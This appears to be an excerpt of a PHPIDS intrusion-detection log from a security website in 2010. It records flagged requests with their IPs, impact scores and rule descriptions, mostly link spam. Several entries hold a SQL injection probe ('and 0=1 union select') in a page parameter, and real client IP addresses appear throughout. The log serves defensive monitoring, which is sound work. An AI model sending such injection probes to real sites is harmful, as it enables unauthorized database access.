Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122204
Name:POST.codeme
Value:Incredible site!, <a href= http://newoldnursingschools.tumblr.com/#1 >nursing schools</a> [url=http://newoldnursingschools.tumblr.com/#1]nursing schools[/url], awmh,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 23:34:33
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122201
Name:REQUEST.page
Value:security/ps2 and 0=1 union select -and-usb-hardware-keyloggers-3-keyllama
Page:/i.php?page=security/ps2+and+0=1+union+select+-and-usb-hardware-keyloggers-3-keyllama
IP:96.9.159.206
Impact:20
Created:2010-04-21 23:19:20
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122202
Name:GET.page
Value:security/ps2 and 0=1 union select -and-usb-hardware-keyloggers-3-keyllama
Page:/i.php?page=security/ps2+and+0=1+union+select+-and-usb-hardware-keyloggers-3-keyllama
IP:96.9.159.206
Impact:20
Created:2010-04-21 23:19:20
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122199
Name:REQUEST.page
Value:security/usb-hardware-keyloggers-1 and 0=1 union select -keycarbon
Page:/i.php?page=security/usb-hardware-keyloggers-1+and+0=1+union+select+-keycarbon
IP:96.9.159.206
Impact:20
Created:2010-04-21 23:18:35
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122200
Name:GET.page
Value:security/usb-hardware-keyloggers-1 and 0=1 union select -keycarbon
Page:/i.php?page=security/usb-hardware-keyloggers-1+and+0=1+union+select+-keycarbon
IP:96.9.159.206
Impact:20
Created:2010-04-21 23:18:35
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122197
Name:REQUEST.codeme
Value:Best Wishes!, <a href= http://powerwheelchair.tumblr.com/#1 >Cheap power wheelchair</a> [url=http://powerwheelchair.tumblr.com/#1]Cheap power wheelchair[/url], hhpzw,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 22:55:03
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122198
Name:POST.codeme
Value:Best Wishes!, <a href= http://powerwheelchair.tumblr.com/#1 >Cheap power wheelchair</a> [url=http://powerwheelchair.tumblr.com/#1]Cheap power wheelchair[/url], hhpzw,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 22:55:03
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122195
Name:REQUEST.codeme
Value:I want to say thanks!, <a href= http://telemarketingleads.tumblr.com/#1 >telemarketing leads</a> [url=http://telemarketingleads.tumblr.com/#1]telemarketing leads[/url], %-]]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-21 22:16:06
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122196
Name:POST.codeme
Value:I want to say thanks!, <a href= http://telemarketingleads.tumblr.com/#1 >telemarketing leads</a> [url=http://telemarketingleads.tumblr.com/#1]telemarketing leads[/url], %-]]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-21 22:16:06
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122193
Name:REQUEST.codeme
Value:Real, <a href= http://timecardsoftware.tumblr.com/#1 >All about timecard software</a> [url=http://timecardsoftware.tumblr.com/#1]All about timecard software[/url], 37242,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 21:36:43
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122194
Name:POST.codeme
Value:Real, <a href= http://timecardsoftware.tumblr.com/#1 >All about timecard software</a> [url=http://timecardsoftware.tumblr.com/#1]All about timecard software[/url], 37242,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 21:36:43
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122191
Name:REQUEST.codeme
Value:Perfect work, <a href= http://directlender.tumblr.com/#1 >direct lender information</a> [url=http://directlender.tumblr.com/#1]direct lender information[/url], yexbjy,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 20:18:31
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122192
Name:POST.codeme
Value:Perfect work, <a href= http://directlender.tumblr.com/#1 >direct lender information</a> [url=http://directlender.tumblr.com/#1]direct lender information[/url], yexbjy,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 20:18:31
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122189
Name:REQUEST.codeme
Value:Perfect work, <a href= http://coedsneedcash.tumblr.com/ >First coeds need cash</a>, [url= http://coedsneedcash.tumblr.com/ ]First coeds need cash[/url], 483,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-21 19:39:05
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122190
Name:POST.codeme
Value:Perfect work, <a href= http://coedsneedcash.tumblr.com/ >First coeds need cash</a>, [url= http://coedsneedcash.tumblr.com/ ]First coeds need cash[/url], 483,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-21 19:39:05
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122187
Name:REQUEST.codeme
Value:can you do thi for me, <a href= http://thegiftbaskets.tumblr.com/#1 >gift baskets</a> [url=http://thegiftbaskets.tumblr.com/#1]gift baskets[/url], 351113,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 18:59:47
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122188
Name:POST.codeme
Value:can you do thi for me, <a href= http://thegiftbaskets.tumblr.com/#1 >gift baskets</a> [url=http://thegiftbaskets.tumblr.com/#1]gift baskets[/url], 351113,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 18:59:47
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122185
Name:REQUEST.codeme
Value:I like your work!, <a href= http://gaspoweredscooters.tumblr.com/#1 >Cheap gas powered scooters</a> [url=http://gaspoweredscooters.tumblr.com/#1]Cheap gas powered scooters[/url], %-),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-21 17:41:41
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++::

ID:122186
Name:POST.codeme
Value:I like your work!, <a href= http://gaspoweredscooters.tumblr.com/#1 >Cheap gas powered scooters</a> [url=http://gaspoweredscooters.tumblr.com/#1]Cheap gas powered scooters[/url], %-),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-21 17:41:41
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++::

ID:122175
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/security/
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122176
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/security/
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122177
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/code/
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122178
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/code/
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122179
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122180
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122181
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122182
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122183
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/browserinfo.php
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122184
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/browserinfo.php
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122171
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122172
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122173
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122174
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:71.59.108.23
Impact:10
Created:2010-04-21 17:37:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122169
Name:REQUEST.codeme
Value:Best Wishes!, <a href= http://onlinegamblingdebts.tumblr.com/ >Only online gambling debts</a>, [url= http://onlinegamblingdebts.tumblr.com/ ]Only online gambling debts[/url], bgn,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:32
Created:2010-04-21 17:02:13
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects possible event handlers | Tags: xss, csrf | ID: 32
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122170
Name:POST.codeme
Value:Best Wishes!, <a href= http://onlinegamblingdebts.tumblr.com/ >Only online gambling debts</a>, [url= http://onlinegamblingdebts.tumblr.com/ ]Only online gambling debts[/url], bgn,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:32
Created:2010-04-21 17:02:13
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects possible event handlers | Tags: xss, csrf | ID: 32
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122159
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/security/
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:52:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122160
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/security/
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:52:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122161
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/hackingillustrated/
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:52:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122162
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/hackingillustrated/
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:52:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122163
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:52:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122164
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/code/
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:52:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122165
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=security/code/
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:52:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122166
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:52:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122167
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/browserinfo.php
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:52:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122168
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/browserinfo.php
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:52:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122155
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:51:59
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122156
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=mobile-device-hacking
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:51:59
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122157
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:51:59
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122158
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=mobile-device-hacking
IP:71.59.108.23
Impact:10
Created:2010-04-21 16:51:59
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122153
Name:REQUEST.codeme
Value:So where it to find, <a href= http://debtconsolidationnonprofit.tumblr.com/#1 >debt consolidation non profit price</a> [url=http://debtconsolidationnonprofit.tumblr.com/#1]debt consolidation non profit price[/url], 818,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 15:43:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122154
Name:POST.codeme
Value:So where it to find, <a href= http://debtconsolidationnonprofit.tumblr.com/#1 >debt consolidation non profit price</a> [url=http://debtconsolidationnonprofit.tumblr.com/#1]debt consolidation non profit price[/url], 818,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 15:43:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122149
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
IP:71.59.108.23
Impact:10
Created:2010-04-21 15:17:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122150
Name:GET.page
Value:security/hackingillustrated/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
IP:71.59.108.23
Impact:10
Created:2010-04-21 15:17:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122151
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/
IP:71.59.108.23
Impact:10
Created:2010-04-21 15:17:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122152
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/
IP:71.59.108.23
Impact:10
Created:2010-04-21 15:17:14
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122143
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
IP:71.59.108.23
Impact:10
Created:2010-04-21 15:17:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122144
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
IP:71.59.108.23
Impact:10
Created:2010-04-21 15:17:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122145
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/
IP:71.59.108.23
Impact:10
Created:2010-04-21 15:17:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122146
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/
IP:71.59.108.23
Impact:10
Created:2010-04-21 15:17:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122147
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
IP:71.59.108.23
Impact:10
Created:2010-04-21 15:17:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122148
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
IP:71.59.108.23
Impact:10
Created:2010-04-21 15:17:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122141
Name:REQUEST.codeme
Value:Good Job, <a href= http://wholelifeinsurance.tumblr.com/ >whole life insurance now</a>, [url= http://wholelifeinsurance.tumblr.com/ ]whole life insurance now[/url], >:OOO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-21 15:04:17
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122142
Name:POST.codeme
Value:Good Job, <a href= http://wholelifeinsurance.tumblr.com/ >whole life insurance now</a>, [url= http://wholelifeinsurance.tumblr.com/ ]whole life insurance now[/url], >:OOO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-21 15:04:17
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122139
Name:REQUEST.codeme
Value:really great sites, thank you, <a href= http://whatistheaveragepriceof.tumblr.com/#1 >what is the average price of life insurance discount</a> [url=http://whatistheaveragepriceof.tumblr.com/#1]what is the average price of life insurance discount[/url], >:-]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 14:25:11
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122140
Name:POST.codeme
Value:really great sites, thank you, <a href= http://whatistheaveragepriceof.tumblr.com/#1 >what is the average price of life insurance discount</a> [url=http://whatistheaveragepriceof.tumblr.com/#1]what is the average price of life insurance discount[/url], >:-]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 14:25:11
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122137
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
